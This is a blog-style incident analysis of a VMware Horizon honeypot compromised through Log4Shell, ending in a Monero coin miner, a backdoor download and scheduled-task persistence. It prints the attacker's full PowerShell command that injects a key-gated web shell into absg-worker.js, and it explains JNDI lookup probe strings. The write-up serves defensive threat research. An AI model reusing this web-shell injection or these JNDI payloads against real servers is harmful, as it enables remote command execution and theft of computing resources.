Log4Shell — Too Close to Home

7 min readJan 28, 2022

Executive Summary
An advisory shared by VMware, “A Critical vulnerabilities in Apache Log4j identified by CVE-2021–44228 and CVE-2021–45046 have been publicly disclosed which impact VMware products”.

VMWare Horizon is a virtual desktop and as such, is used by organizations globally to provide a remote desktop session to users via a web browser.

Following shared advisory, I decided to set up a honeypot of a vulnerable VMware horizon, version 7.13.0 to identify any likely Indicator of Compromise (IOC) given the reported threats associated with this zero-day vulnerability. The Honeypot was set up 15th December 2021 and made public 17th December 2021 with the following configuration:

OS: Windows Server 2016

VMware Horizon: Version 7.13.0

EDR|Antivirus

Note: Affected servers will be addressed as “192.168.2.2” and URL as “example.com”.

Threat Overview

On January 23rd 2022, i decided to conduct a threat hunting excercise hoping some attacker took the bait on my vulnerable VMware Horizon. You guessed it, an unknown threat actor/group was observed to have exploited the honey pot (192.168.2.2) from its internet accessible URL: <example.com>. The attack exploits the Log4Shell vulnerability in the Apache Tomcat service which is embedded within VMware Horizon.

The attacker was confirmed to have gained access to <192.168.2.2> on December 23rd, 2021 at 4:41:45PM GMT+1.

Also observed, the attacker deployed an elusive “Monero” Coin Miner on the affected server.

Detailed Findings

Initial Validation

For a proof of concept, <example.com> was tested for Apache Log4Shell Vulnerability using cURL:

The above DNS interaction confirms the server is vulnerable to Log4Shell.

let me explain how this works:

Log4Shell is the result of a feature in the Log4j library failing to properly validate incoming data. Log4j uses Message Lookup Substitution (MLS) to define a number of ‘lookup’ functions that allow Log4j to alter content as it is being logged and is typically used to dynamically edit certain logging tags. MLS is triggered whenever content with the form ${example} appears in strings to be logged.
MLS uses Java Naming and Directory Interface (JNDI), a directory service API that allows Java clients — such as Log4j — to find and execute resources. JNDI is able to pull content directly from outside domains using several network protocols. By triggering a JNDI lookup over Lightweight Directory Access Protocol (LDAP) to a specific domain in the form ${jndi:ldap://example.com}, Log4j will download and execute content hosted on that domain. Once an outdated version of log4j sees this string ${jndi:ldap://example.com:12345/}, it will perform a DNS lookup to get the IP address of “example.com”. If this happens, the asset is considered vulnerable.

The attack exploits the Log4Shell vulnerability in the Apache Tomcat service which is embedded within VMware Horizon. This then launches the following PowerShell command, spawned from ws_TomcatService.exe:

2. Analysis and Revelation

The malicious payload was first detected on December 23rd 2021 at 4:41:45PM GMT+1 attempting to perform the following actions depicted in the image below:

Attempt to open itself for modification
Attempt to enable executable in memory
Attempt to find “C:\Windows”
Attempt to list all processes
Attempt to create a viewable window
Attempt to pass commands to the service control manager

Malicious Payload Breakdown

powershell -c “$path=gwmi win32_service|?{$_.Name -like “””*VMBlastSG*”””}|%{$_.PathName -replace ‘“””’, ‘’ -replace “””nssm.exe”””,”””lib\absg-worker.js”””};

The executed command invokes Get-WMIObject on win32_service, returning a list of service names containing ‘VMBlastSG’. It identifies the file path for the service, replaces instances of ‘nssm.exe’ with ‘lib/absg-worker.js’ and writes this path to $path, thereby identifying the location of the ‘absg-worker.js’ file for the targeted VMware Horizon instance.

$expr=”””req.connection.end();`r`n`t`t`t}`r`n`r`n`t`t`tif (String(req.url).includes(‘lxmvvZ3S4o250Tw22Z9vTao0cJFmkplDoi828cVwQtZVj3eUbb’)) {`r`n`t`t`t`ttry {`r`n`t`t`t`t`treplyError(req, res, 200, require(‘child_process’).execSync(`r`n`t`t`t`t`t`tBuffer.from(req.headers[‘data’], ‘base64’).toString(‘ascii’)`r`n`t`t`t`t`t).toString());`r`n`t`t`t`t}`r`n`t`t`t`tcatch (err) {`r`n`t`t`t`t`treplyError(req, res, 400, err.stderr.toString());`r`n`t`t`t`t}`r`n`t`t`t`treturn;”””;

This writes a code block to $expr that listens for any web requests containing a specific, hardcoded string in the URI before executing arbitrary commands contained in the ‘data’ header object. The output is delivered to the attacker via ‘replyError’ where requests contained the specified string, otherwise, a standard error message is returned.

(Get-Content $path)|ForEach-Object {$_ -replace “””req.connection.end\;”””, $expr}|Set-Content $path;Restart-Service -Force VMBlastSG”

The next command executed retrieves the list of service path names stored in $path and for each replaces any instances of “req.connection.end()\;” with the code block stored in $expr described above, thereby injecting the web shell. The altered ‘absg-worker.js’ will typically contain the attacker’s specified string:

In this case, the attacker deleted the content of the “absg-worker.js”, we would assume this was in an effort to erase evidence of a compromise.

As can be seen in the image above, a successful attempt to modify another running process exactly the same time as absg-worker.js content was erased. ps, you’re free to make of that activity what you will.

The “VMBLastSG” service is then forcibly restarted to initiate the listener.

Once established, the listener executed arbitrary commands received in crafted web (HTTP / HTTPS) requests which contained the hardcoded string (key) in the URI of the request. The commands are stored as a header object (named ‘data’) in the crafted requests.

For additional information on Log4Shell, visit:

https://blog.viettelcybersecurity.com/the-log4shell-vulnerability-may-have-been-exploited-since-august-2021/

https://digital.nhs.uk/cyber-alerts/2022/cc-4002

Installation and Exploitation

Following the above breach, the attacker/Threat actor was observed executing PowerShell and using the built-in System.Net.WebClient object to download cryptocurrency mining software (Coin Miner)on <192.168.2.2>.

Encrypted PowerShell payload to download Coin miner Propagator script (mad_micky.bat)

Following the previously reported malicious injection of “ws_Tomcatservice.exe” by the attacker/threat actor during the initial stage, the “ws_Tomcatservice.exe” service can be observed spawning malicious execution of cmd.exe and PowerShell.exe.

Malicious Bat Script Analysis

The review of the bat script (mad_micky.bat) revealed the attacker crypto wallet address. Using a hash identifier tool (https://hashes.com/en/tools/hash_identifier) I was able to identify and confirm the crypto wallet address: Monero.

Using the above wallet address, I was able to access the attacker’s Monero crypto wallet.

The threat actor/attacker has 395 servers currently mining Monero Crypto currency. Majority of which were observed to be VMware Horizon servers from multiple cooperate environment/organization.

Based on the above number of servers, the attacker is estimated to rake £31.67 (Pounds) a day.

Back to our analysis, the script in the screenshot above downloads xmrig.zip and goes on to download 7za in .txt format and rename to 7za.exe to extract and execute xmrig.exe.

The script defines the mining processing hash rate to ensure the resource on <192.168.2.2> are not overwhelmed and by so doing, no noticeable drag on the server. Ps, your guess is as good as mine, who’s gonna know, no one is gonna know

If the version of xmrig.exe downloaded is removed by antivirus, the script goes to a defined GitHub URL to download an updated version likely to evade antivirus detection. Mad_micky.bat script was observed to have many contingencies to ensure an updated coin miner tool is downloaded, executed and cleaned up after successful execution.

In an instance, one of the additional downloaded scripts attempts to use System.Net.WebClient to download a rudimentary backdoor “Logback.exe”.

Backdoor, miner configuration, cleanup bat script

If the script is running under “system” access, a wmi object namespace is created and a scheduled task to execute and download a script from Pastebin to maintain persistence.

note: scripts have been taken down from Pastebin

CleanUp

The mad_micky.bat script does a good job at having multiple redundancy and cleanup accounted for. As can be seen in the image below, the attacker can be likened to a cat (Cleaning up after themselves)

Conclusion

The attack exploits the Log4Shell vulnerability in the Apache Tomcat service which is embedded within VMware Horizon. This vulnerability was exploited to deploy a sophisticated coin miner on the affected server.

Further investigations did not detect any other activity carried out by the attacker/threat actor.